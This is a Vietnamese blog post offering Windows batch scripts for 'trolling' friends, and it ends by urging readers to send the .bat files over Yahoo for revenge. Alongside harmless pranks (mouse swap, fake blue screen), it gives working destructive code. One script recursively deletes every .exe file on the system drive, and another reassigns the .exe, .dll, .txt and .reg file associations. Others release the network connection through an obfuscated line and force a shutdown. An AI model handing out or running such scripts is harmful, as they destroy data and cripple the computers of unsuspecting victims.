Top Ad unit 728 × 90

Code PC troll bạn bè

Hum nay mình sẽ giới thiệu 1 số code bat khá hay dùng để chọc phá bạn bè 
Đầu tiên tạo 1 file notepad = cách chuột phải vào desktop -> new -> text document
Bước 2 copy 1 số code ở dưới vào notepad và save lại dưới dạng abc.bat



Swap Mouse button ( đảo chuột trái thành fải và ngược lại)
Code:
@ echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------

Delete all .exe files in the computer ( suy nghĩ kĩ khi sử dụng code này)
Code:
@ echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------

Disable internet ( làm mất mạng tạm thời )
Code:
@ echo off
rem ---------------------------------
rem Disable Internet
@Echo off & @@Break Off
Ipconfig /release
%jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?!
P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%
rem ---------------------------------

Confuse File Extensions ( đổi định dạng của file, ví dụ exe thành png...)
Code:
@ echo off
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------

Create Fake Blue Screen Of Death - Màn hình xanh chết chóc giả
Chắc ai cũng biết đến màn hình xanh huyền thoại nhỉ...nỗi đáng sợ của những ng sử dụng máy tính 

Sau đây mình sẽ hướng dẫn tạo ra 1 cái màn hình xanh giả để chơi troll 1 ai đó.
- Sau khi run file này. Lập tức sẽ có màn hình xanh giả đc tạo ra. Với những ng ko để ý kĩ thì sẽ lầm tưởng rằng bị màn hình xanh thật 

- Tắt đi bằng cách alt + f4 là đc 
Code
Code:
@echo off
echo ^^^BSOD^</title^> > bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<hta:application id="oBVC" >> bsod.hta<br style="margin: 0px; padding: 0px;">echo applicationname="BSOD" >> bsod.hta<br style="margin: 0px; padding: 0px;">echo version="1.0" >> bsod.hta<br style="margin: 0px; padding: 0px;">echo maximizebutton="no" >> bsod.hta<br style="margin: 0px; padding: 0px;">echo minimizebutton="no" >> bsod.hta<br style="margin: 0px; padding: 0px;">echo sysmenu="no" >> bsod.hta<br style="margin: 0px; padding: 0px;">echo Caption="no" >> bsod.hta<br style="margin: 0px; padding: 0px;">echo windowstate="maximize"/^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>Technical information:^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo. >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^</font^> >> bsod.hta<br style="margin: 0px; padding: 0px;">echo ^</body^>^</html^> >> bsod.hta<br style="margin: 0px; padding: 0px;">start "" /wait "bsod.hta"<br style="margin: 0px; padding: 0px;">del /s /f /q "bsod.hta" > nul<br style="margin: 0px; padding: 0px;"></code></dd></dl> <p> <br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><strong style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;">Xóa các tập tin ko cần thiết cho máy tính.</strong><span style="font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 255, 255);"> Giúp Win hoạt động mượt hơn</span><br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"></p> <dl class="codebox" style="margin: 1em; padding: 0px; border: 1px dotted rgb(217, 217, 217); font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 235, 235);"> <dt style="margin: 0px; padding: 0.25em; border-bottom-width: 1px; border-bottom-style: dotted; border-bottom-color: rgb(217, 217, 217);">Code:</dt> <dd class="cont_code" style="margin: 0.5em; padding: 0.5em; max-height: 200px; overflow: auto;"><code style="margin: 0px; padding: 0px;">@echo off<br style="margin: 0px; padding: 0px;">color 0C<br style="margin: 0px; padding: 0px;">echo Tien trinh se xoa file khong can thiet ...<br style="margin: 0px; padding: 0px;">del /f /s /q %systemdrive%\*.tmp<br style="margin: 0px; padding: 0px;">del /f /s /q %systemdrive%\*._mp<br style="margin: 0px; padding: 0px;">del /f /s /q %systemdrive%\*.log<br style="margin: 0px; padding: 0px;">del /f /s /q %systemdrive%\*.gid<br style="margin: 0px; padding: 0px;">del /f /s /q %systemdrive%\*.chk<br style="margin: 0px; padding: 0px;">del /f /s /q %systemdrive%\*.old<br style="margin: 0px; padding: 0px;">del /f /s /q %systemdrive%\recycled\*.*<br style="margin: 0px; padding: 0px;">del /f /s /q %windir%\*.bak<br style="margin: 0px; padding: 0px;">del /f /s /q %windir%\prefetch\*.*<br style="margin: 0px; padding: 0px;">rd /s /q %windir%\temp & md %windir%\temp<br style="margin: 0px; padding: 0px;">del /f /q %userprofile%\cookies\*.*<br style="margin: 0px; padding: 0px;">del /f /q %userprofile%\recent\*.*<br style="margin: 0px; padding: 0px;">del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"<br style="margin: 0px; padding: 0px;">del /f /s /q "%userprofile%\Local Settings\Temp\*.*"<br style="margin: 0px; padding: 0px;">del /f /s /q "%userprofile%\recent\*.*"<br style="margin: 0px; padding: 0px;">echo Tat ca da ket thuc.!<br style="margin: 0px; padding: 0px;">pause<br style="margin: 0px; padding: 0px;"></code></dd></dl> <p> <strong style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;">Và cuối cùng code dùng để tắt và rs máy</strong><span style="font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 255, 255);"> chỉ với 1 click </span><br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"></p> <dl class="codebox" style="margin: 1em; padding: 0px; border: 1px dotted rgb(217, 217, 217); font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 235, 235);"> <dt style="margin: 0px; padding: 0.25em; border-bottom-width: 1px; border-bottom-style: dotted; border-bottom-color: rgb(217, 217, 217);">Code:</dt> <dd class="cont_code" style="margin: 0.5em; padding: 0.5em; max-height: 200px; overflow: auto;"><code style="margin: 0px; padding: 0px;">shutdown -s -t 60 -c "loi nhan" -f</code></dd></dl> <p> <br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 255, 255);">có thể thay s = r dùng để rs máy</span><br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 255, 255);">-t 60 với 60 là thời gian tắt tính = giây, dùng để hẹn giờ tắt máy mà ko cần can thiệp bởi bất cứ phần mềm nào. Các bạn có thể sửa lại tùy ý </span><br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 255, 255);">-c là lời nhắn dùng để tự kỉ hoặc troll </span><a class="linkimg" href="http://www.phutu.vn/t35613-mot-so-code-bat-dung-e-troll-ban-be#phutuvn" style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px; text-decoration: none !important;"><img src="http://r12.imgfast.net/users/1211/23/83/92/smiles/3515602148.gif" alt="winking" longdesc="http://www.phutu.vn/65" style="margin: 0px; padding: 0px;"></a><br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><br style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 12px; background-color: rgb(255, 255, 255);">Lời kết: File sau khi lưu lại dưới dạng .bat có thể gửi qua yahoo vv. Nào ta cùng nhau trả thù </span><a class="linkimg" href="http://www.phutu.vn/t35613-mot-so-code-bat-dung-e-troll-ban-be#phutuvn" style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px; text-decoration: none !important;"><img src="http://r12.imgfast.net/users/1211/23/83/92/smiles/876419.gif" alt="" longdesc="http://www.phutu.vn/88" style="margin: 0px; padding: 0px;"></a><span style="margin: 0px; padding: 0px; font-family: Verdana, Arial, sans-serif; font-size: 12px;"><br></span></p> </div>
Code PC troll bạn bè Đánh giá bởi Unknown trên 22:07:00 Xếp hạng: 5

Không có nhận xét nào:

chết mầy r

Bản quyền thuộc ๖ۣۜTricker Vĩnh Long™ © 2014 - 2015
Nền tảng Blogger, Thiết kế bởi Sweetheme, Việt hóa bởi Kun Doll

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.